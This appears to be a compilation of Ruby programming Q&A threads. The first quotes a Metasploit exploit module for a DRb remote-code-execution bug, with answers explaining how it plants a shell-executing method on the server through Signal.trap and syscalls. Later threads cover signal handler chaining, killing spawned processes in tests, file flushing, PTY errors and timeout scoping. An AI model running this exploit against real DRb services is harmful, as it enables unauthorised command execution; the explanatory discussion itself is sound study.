Understanding ruby syntax "class << variable" - ruby

I've been looking at an old bug in DRb using metasploit, which uses the method:
def exploit
serveruri = datastore['URI']
DRb.start_service
p = DRbObject.new_with_uri(serveruri)
class << p
undef :send
end
p.send(:trap, 23, :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
# syscall to decide whether it's 64 or 32 bit:
# it's getpid on 32bit which will succeed, and writev on 64bit
# which will fail due to missing args
begin
pid = p.send(:syscall, 20)
p.send(:syscall, 37, pid, 23)
rescue Errno::EBADF
# 64 bit system
pid = p.send(:syscall, 39)
p.send(:syscall, 62, pid, 23)
end
p.send(:my_eval, payload.encoded)
end
I'm not a ruby programmer, but I have a general sense of what's going on besides few lines.
Can anyone explain what's happening in lines 5-9? (starts at "class << ...")

class << p
undef :send
end
This undefined the send method of the object p (send is used for dynamically invoking methods on a receiver).
It does this in order to exploit DRbObject's method_missing implementation, which routes method calls to remote objects. I'm not too familiar with DRb, but I'm guessing this may have been done in order to get things past DRbServer's check_insecure_method check, but I'll leave that as an exercise to you since it's outside the scope of the question asked here.
Once it achieves whatever it needed to do through method_missing it adds a method my_eval to Object on the server process, which then uses system to execute the payload as a shell command.

class << p
undef :send
end
This chunk undefines send on the local DRbObject instance. As Michael pointed out, if a DRbObject does not have a method defined, it will route the method call to the remote server using method_missing.
In this case, all succeeding send calls will be routed to the remote server and evaluated there instead of the local instance.
p.send(:trap, 23, :"class Object\ndefmy_eval(str)\nsystem(str.untaint)\nend\nend")
This triggers Signal.trap with signal 23 and a symbol which appears to contain a chunk of code which if evaluated, will create a method on Object which provides direct access to the shell.
According to the documentation, Signal.trap can be used to run a block or a command upon receiving a specific signal from the operating system. It's not very clear what a command is, so I did some playing around.
> pid = fork { Signal.trap(23, :"puts 'test'"); puts "sleeping"; sleep 10 }
sleeping #=> 37162
>> Process.detach(pid) #=> #<Thread:0x007f9e13a61d60 sleep>
>> Process.kill(23, pid)
test #=> 1
Looks like a command in symbol form will be converted to string then evaled by Signal.trap.
# syscall to decide whether it's 64 or 32 bit:
# it's getpid on 32bit which will succeed, and writev on 64bit
# which will fail due to missing args
begin
pid = p.send(:syscall, 20)
p.send(:syscall, 37, pid, 23)
This section triggers Kernel#syscall which calls Unix kernel functions. The rescue bit handles 64 bit syscall numbers. Let's just look at the 32 bit section here:
p.send(:syscall, 20) should evaluate to sys_getpid()
p.send(:syscall, 37, pid, 23) should evaluate to sys_kill(<pid>, 23). This will trigger the earlier trap set up for signal 23.
In conclusion, the exploit:
Undefines send to force messages through method_missing
Uses method_missing to trigger Signal.trap(23) with a chunk of ruby code converted to a one line string in symbol form
Uses Kernel#syscall to get the PID of the currently running process
Uses Kernel#syscall to call kill -23 <pid>, which causes the trap set up in 2 to trigger, which in turn evals the provided symbol to create the my_eval method on Object which provides access to system (shell command line access)
Calls the newly created my_eval method with the payload
References:
http://syscalls.kernelgrok.com/
https://ruby-doc.org/core-2.2.0/Signal.html#method-c-trap
https://ruby-doc.org/core-2.2.0/Kernel.html#method-i-syscall

Related

Is it possible to have multiple traps for a signal

I'm trying to understand Ruby's traps for standard signals.
In specific, I'm trying to have multiple signal handlers ("traps") for the same signal. It seems impossible. Here's a super simplified code to demonstrate the problem:
file traps.rb:
should_stop = false
Signal.trap 'INT' do
# won't be executed :(
puts 'int --> A'
should_stop = true
end
Signal.trap 'INT' do
# will be executed
puts 'int --> B'
should_stop = true
end
times = 0
until should_stop
puts 'waiting to stop'
sleep 1
times += 1
break if times >= 5
end
puts 'done'
Run the code:
ruby traps.rb
Output without pressing CTRL+C:
waiting to stop
waiting to stop
waiting to stop
waiting to stop
waiting to stop
done
Output with pressing CTRL+C after 2 seconds:
waiting to stop
waiting to stop
^Cint --> B
done
It seems that only the last signal trap to be declared is the one which would be executed.
Is this behavior by design?
If not, how can we have multiple handlers executed to the same signal?
The main reason for asking this is that third party libraries might add their trap to a signal.
If we have two different third party libraries that add their trap to the same signal, only one of them would actually be executed. That's where the fun begins :(
It seems that only the last signal trap to be declared is the one which would be executed.
Is this behavior by design?
It is not very explicit in the documentation of Signal::trap, but it is by design:
The command or block specifies code to be run when the signal is raised.
Note the use of the singular, and the absence of any mention of something like "The command or block is added to the list of trap handlers to be run when the signal is raised."
It becomes clearer if you look at the POSIX trap shell builtin after which Signal::trap is modeled:
The action of trap shall override a previous action (either default action or one explicitly set).
The POSIX sigaction function which is the C equivalent to trap says more or less the same thing. Note, however, that the sigaction function also gives a way of retrieving the function pointer to the old action, so theoretically, you could set the action to a function pointer to a new action which uses the function pointer to the old action to call the old action as part of itself, thus in some way chaining the actions.
Note, however, that this would require the old and new action cooperate in some way. Also note that this mode of operation is not modeled by POSIX trap.
If not, how can we have multiple handlers executed to the same signal?
From the documentation:
trap returns the previous handler for the given signal.
So, Signal::trap implements the behavior from sigaction that gives you access to the "old" handler. You could save that old handler somewhere and chain the calls by explicitly calling it from your new handler.
Like with sigaction, this requires some form of cooperation between the handlers.
Combining the answer from Jörg W Mittag and the documentation, here's a simplified solution:
# file traps.rb
should_stop = false
Signal.trap('INT') do
puts 'int --> A'
should_stop = true
end
$prev_trap = Signal.trap('INT') do
puts 'int --> B'
should_stop = true
$prev_trap&.call
end
times = 0
until should_stop
puts 'waiting to stop'
sleep 1
times += 1
break if times >= 5
end
puts 'done'
After running ruby traps.rb, and pressing CTRL+C after 3 seconds, the output looks like this:
waiting to stop
waiting to stop
waiting to stop
^Cint --> B
int --> A
done

How to stop a process from within the tests, when testing a never-ending process?

I am developing a long-running program in Ruby. I am writing some integration tests for this. These tests need to kill or stop the program after starting it; otherwise the tests hang.
For example, with a file bin/runner
#!/usr/bin/env ruby
while true do
puts "Hello World"
sleep 10
end
The (integration) test would be:
class RunReflectorTest < TestCase
test "it prints a welcome message over and over" do
out, err = capture_subprocess_io do
system "bin/runner"
end
assert_empty err
assert_includes out, "Hello World"
end
end
Only, obviously, this will not work; the test starts and never stops, because the system call never ends.
How should I tackle this? Is the problem in system itself, and would Kernel#spawn provide a solution? If so, how? Somehow the following keeps the out empty:
class RunReflectorTest < TestCase
test "it prints a welcome message over and over" do
out, err = capture_subprocess_io do
pid = spawn "bin/runner"
sleep 2
Process.kill pid
end
assert_empty err
assert_includes out, "Hello World"
end
end
. This direction also seems like it will cause a lot of timing-issues (and slow tests). Ideally, a reader would follow the stream of STDOUT and let the test pass as soon as the string is encountered and then immediately kill the subprocess. I cannot find how to do this with Process.
Test Behavior, Not Language Features
First, what you're doing is a TDD anti-pattern. Tests should focus on behaviors of methods or objects, not on language features like loops. If you must test a loop, construct a test that checks for a useful behavior like "entering an invalid response results in a re-prompt." There's almost no utility in checking that a loop loops forever.
However, you might decide to test a long-running process by checking to see:
If it's still running after t time.
If it's performed at least i iterations.
If a loop exits properly given certain input or upon reaching a boundary condition.
Use Timeouts or Signals to End Testing
Second, if you decide to do it anyway, you can just escape the block with Timeout::timeout. For example:
require 'timeout'
# Terminates block
Timeout::timeout(3) { `sleep 300` }
This is quick and easy. However, note that using timeout doesn't actually signal the process. If you run this a few times, you'll notice that sleep is still running multiple times as a system process.
It's better is to signal the process when you want to exit with Process::kill, ensuring that you clean up after yourself. For example:
pid = spawn 'sleep 300'
Process::kill 'TERM', pid
sleep 3
Process::wait pid
Aside from resource issues, this is a better approach when you're spawning something stateful and don't want to pollute the independence of your tests. You should almost always kill long-running (or infinite) processes in your test teardown whenever you can.
Ideally, a reader would follow the stream of STDOUT and let the test pass as soon as the string is encountered and then immediately kill the subprocess. I cannot find how to do this with Process.
You can redirect stdout of spawned process to any file descriptor by specifying out option
pid = spawn(command, :out=>"/dev/null") # write mode
Documentation
Example of redirection
With the answer from CodeGnome on how to use Timeout::timeout and the answer from andyconhin on how to redirect Process::spawn IO, I came up with two Minitest helpers that can be used as follows:
it "runs a deamon" do
wait_for(timeout: 2) do
wait_for_spawned_io(regexp: /Hello World/, command: ["bin/runner"])
end
end
The helpers are:
def wait_for(timeout: 1, &block)
Timeout::timeout(timeout) do
yield block
end
rescue Timeout::Error
flunk "Test did not pass within #{timeout} seconds"
end
def wait_for_spawned_io(regexp: //, command: [])
buffer = ""
begin
read_pipe, write_pipe = IO.pipe
pid = Process.spawn(command.shelljoin, out: write_pipe, err: write_pipe)
loop do
buffer << read_pipe.readpartial(1000)
break if regexp =~ buffer
end
ensure
read_pipe.close
write_pipe.close
Process.kill("INT", pid)
end
buffer
end
These can be used in a test which allows me to start a subprocess, capture the STDOUT and as soon as it matches the test Regular Expression, it passes, else it will wait 'till timeout and flunk (fail the test).
The loop will capture output and pass the test once it sees matching output. It uses a IO.pipe because that is most transparant for subprocesses (and their children) to write to.
I doubt this will work on Windows. And it needs some cleaning up of the wait_for_spawned_io which is doing slightly too much IMO. Antoher problem is that the Process.kill('INT') might not reach the children which are orphaned but still running after this test has ran. I need to find a way to ensure the entire subtree of processes is killed.

When does ruby release its File.write assignments?

I am writing to a file instance. While the program is still running, the file is always empty. When I check the file after the script has executed, the file has content.
class A
def initialize
#file_ref=File.new("/user/shared/ruby/ruby-example/test.html","w+")
end
def fill
#file_ref.write("whatever\nwhatever\nwhatever\n")
end
end
The Main script:
require_relative 'A'
a=A.new
a.fill
puts File.size("/user/shared/ruby/ruby-example/test.html")
After the A instance has done its job, the puts statement will print "0" as if the file is empty. Indeed it is during program execution, but if I start irb:
puts File.size("/user/shared/ruby/ruby-example/test.html")
# => 27
$ cat test.html
whatever
whatever
whatever
Is my code wrong?
Is it normal that streams are flushed only after the execution of a process?
Ruby flushes IO buffers when you call IO#close or IO#flush. Since you are not calling neither close nor flush the buffers are flushed when the program terminates and the opened file descriptors are released.
Given your simple example a possible solution is:
class A
def initialize
#file_ref_name = '/user/shared/ruby/ruby-example/test.html'
end
def fill
File.open(#file_ref_name, 'w+') do |file|
file.write("whatever\nwhatever\nwhatever\n")
end
end
end
Passing a block to IO#open makes the opened file (the file variable in this example) to be closed (and therefore flushed) once the execution of the block terminates.
Please note that Ruby (to my knowledge since version 1.9) features a one liner shortcut for simple file writes as well, flush included:
File.write('/path/to/file.txt', 'content')

Ruby on Linux PTY goes away without EOF, raises Errno::EIO

I'm writing some code which takes a file, passes that file to one of several binaries for processing, and monitors the conversion process for errors. I've written and tested the following routine on OSX but linux fails for reasons about which I'm not clear.
#run the command, capture the output so it doesn't display
PTY.spawn(command) {|r,w,pid|
until r.eof? do
##mark
puts r.readline
end
}
The command that runs varies quite a lot and the code at the ##mark has been simplified into a local echo in an attempt to debug the problem. The command executes and the script prints the expected output in the terminal and then throws an exception.
The error it produces on Debian systems is: Errno::EIO (Input/output error - /dev/pts/0):
All of the command strings I can come up with produce that error, and when I run the code without the local echo block it runs just fine:
PTY.spawn(command) {|r,w,pid|}
In either case the command itself executes fine, but it seems like debian linux isn't sending eof up the pty. The doc pages for PTY, and IO on ruby-doc don't seem to lend any aid here.
Any suggestions? Thanks.
-vox-
So I had to go as far as reading the C source for the PTY library to get really satisfied with what is going on here.
The Ruby PTY doc doesn't really say what the comments in the source code say.
My solution was to put together a wrapper method and to call that from my script where needed. I've also boxed into the method waiting on the process to for sure exit and the accessing of the exit status from $?:
# file: lib/safe_pty.rb
require 'pty'
module SafePty
def self.spawn command, &block
PTY.spawn(command) do |r,w,p|
begin
yield r,w,p
rescue Errno::EIO
ensure
Process.wait p
end
end
$?.exitstatus
end
end
This is used basically the same as PTY.spawn:
require 'safe_pty'
exit_status = SafePty.spawn(command) do |r,w,pid|
until r.eof? do
logger.debug r.readline
end
end
#test exit_status for zeroness
I was more than a little frustrated to find out that this is a valid response, as it was completely undocumented on ruby-doc.
It seems valid for Errno::EIO to be raised here (it simply means the child process has finished and closed the stream), so you should expect that and catch it.
For example, see the selected answer in Continuously read from STDOUT of external process in Ruby and http://www.shanison.com/2010/09/11/ptychildexited-exception-and-ptys-exit-status/
BTW, I did some testing. On Ruby 1.8.7 on Ubuntu 10.04, I don't get a error. With Ruby 1.9.3, I do. With JRuby 1.6.4 on Ubuntu in both 1.8 and 1.9 modes, I don't get an error. On OS X, with 1.8.7, 1.9.2 and 1.9.3, I don't get an error. The behavior is obviously dependent on your Ruby version and platform.
As answered here and here, EIO can be avoided by keeping a file descriptor to the pty slave device open in the parent process.
Since PTY.spawn closes the slave file descriptor passed to the child process, a simple workaround is to open a new one. For example:
PTY.spawn("ls") do |r, w, pid|
r2 = File.open(r.path)
while IO.select([r], [], [], 1)
puts r.gets
end
r2.close
end
ruby-doc.org says this since ruby 1.9:
# The result of read operation when pty slave is closed is platform
# dependent.
ret = begin
m.gets # FreeBSD returns nil.
rescue Errno::EIO # GNU/Linux raises EIO.
nil
end
Ok, so now I get this behavior is "normal" on Linux, but that means it's a little tricky to get the output of a PTY. If you do m.read it reads everything and then throws it away and raises Errno::EIO. You really need to read the content chunk by chunk with m.readline. And even then you risk losing the last line if it doesn't end with "\n" for whatever reason. To be extra safe you need to read the content byte by byte with m.read(1)
Additional note about the effect of tty and pty on buffering: it's not the same as STDOUT.sync = true (unbuffered output) in the child process, but rather it triggers line buffering, where output is flushed on "\n"

Timeout issue making system call in Ruby on Windows XP

The following code
require 'timeout'
begin
timeout(20) do # Line 4
result = `hostname`
end # Line 6
rescue Timeout::Error
puts "Timeout"
exit
end
puts "Result:" + result # Line 12
throws the error
issue.rb:12:in <main>': undefined local variable or methodresult' for
main:Object (NameError)
but if I comment out the timeout element (lines 4 and 6), it works fine. I have tried using IO.popen, IO.select etc but none of this helps. I've used this timeout technique in many other areas and it worked fine.
It doesn't appear to be related to the timeout value as I have experimented with much larger and smaller values.
Am using Ruby 1.92 on Windows XP. Any help much appreciated.
p.s. My original problem was not running "hostname" but a more complex SQL Server batch job. As a bonus point, would a long running system task that exceeded the timeout be automatically killed? I have read lots of posts about the timeout library not honouring timeouts when busy running system tasks?
The result variable is being defined inside the timeout block, so it's not visible in the outer scope. You should initialize it before:
result = nil
begin
timeout(20) do # Line 4
result = `hostname`
end # Line 6
rescue Timeout::Error
...

Resources